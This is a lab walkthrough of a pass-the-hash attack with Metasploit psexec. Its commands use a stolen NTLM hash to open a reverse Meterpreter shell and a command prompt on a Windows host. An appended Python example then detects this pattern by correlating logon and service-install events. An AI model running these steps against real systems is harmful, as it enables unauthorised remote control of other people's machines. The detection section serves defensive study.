Pass The Hash Reverse Shell With Metasploit

Kali: 173.18.131.94
Victim: 173.18.131.111

root@kali:/usr/bin# ./msfconsole
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set lhost 173.18.131.94
lhost => 173.18.131.94
msf exploit(psexec) > set rhost 173.18.131.111
rhost => 173.18.131.111
msf exploit(psexec) > set smbpass 00000000000000000000000000000000:b048b97d9fdb66d3d2ed72b3782847a4
smbpass => 00000000000000000000000000000000:b048b97d9fdb66d3d2ed72b3782847a4
msf exploit(psexec) > set smbuser administrator
smbuser => administrator
msf exploit(psexec) > set smbdomain test
smbdomain => test
msf exploit(psexec) > exploit

[*] Started reverse TCP handler on 173.18.131.94:4444
[*] Connecting to the server...
[*] Authenticating to 173.18.131.111:445|test as user 'administrator'...
[*] Selecting PowerShell target
[*] 173.18.131.111:445 - Executing the payload...
[+] 173.18.131.111:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957487 bytes) to 173.18.131.111
[*] Meterpreter session 1 opened (173.18.131.94:4444 -> 173.18.131.111:49811) at 2016-03-09 16:44:58 -0500

meterpreter > shell
Process 2212 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
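
A defender's view of the session above, as an added example that is not part of the original post: the "Service start timed out" line shows the module started a service after authenticating over SMB with an NTLM hash, so the target records a Security 4624 network logon (LogonType 3, NTLM) followed by a System 7045 service install. The host name, service names, second IP and the 30-second window below are constructed assumptions; only the two lab addresses and the timestamp come from the page.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs). Field names follow Windows
# Security event 4624 (logon) and System event 7045 (service installed).
EVENTS = [
    {"id": 4624, "time": "2016-03-09T16:44:55", "host": "VICTIM", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "administrator",
     "IpAddress": "173.18.131.94"},
    {"id": 7045, "time": "2016-03-09T16:44:56", "host": "VICTIM",
     "ServiceName": "kXyZqPlm", "ImagePath": "<constructed command line>"},
    # Benign noise: a Kerberos logon and an unrelated service install.
    {"id": 4624, "time": "2016-03-09T09:00:00", "host": "VICTIM", "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "TargetUserName": "alice",
     "IpAddress": "173.18.131.50"},
    {"id": 7045, "time": "2016-03-09T12:00:00", "host": "VICTIM",
     "ServiceName": "UpdaterSvc", "ImagePath": "C:\\Program Files\\Updater\\svc.exe"},
]

WINDOW = timedelta(seconds=30)  # assumed correlation window, tune per environment


def _ts(event):
    return datetime.fromisoformat(event["time"])


def find_remote_service_exec(events, window=WINDOW):
    """Pair each NTLM network logon with a service install that follows it
    on the same host within `window`. Returns one alert dict per pair."""
    logons = [e for e in events
              if e["id"] == 4624 and e.get("LogonType") == 3
              and e.get("AuthenticationPackageName") == "NTLM"]
    alerts = []
    for svc in (e for e in events if e["id"] == 7045):
        for logon in logons:
            delta = _ts(svc) - _ts(logon)
            if logon["host"] == svc["host"] and timedelta(0) <= delta <= window:
                alerts.append({
                    "host": svc["host"],
                    "source_ip": logon["IpAddress"],
                    "user": logon["TargetUserName"],
                    "service": svc["ServiceName"],
                    "seconds_after_logon": delta.total_seconds(),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_remote_service_exec(EVENTS):
        print(alert)
```

Legitimate remote administration tools also install services over SMB, so a match is a triage lead that needs the source host and account checked against expected admin activity.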
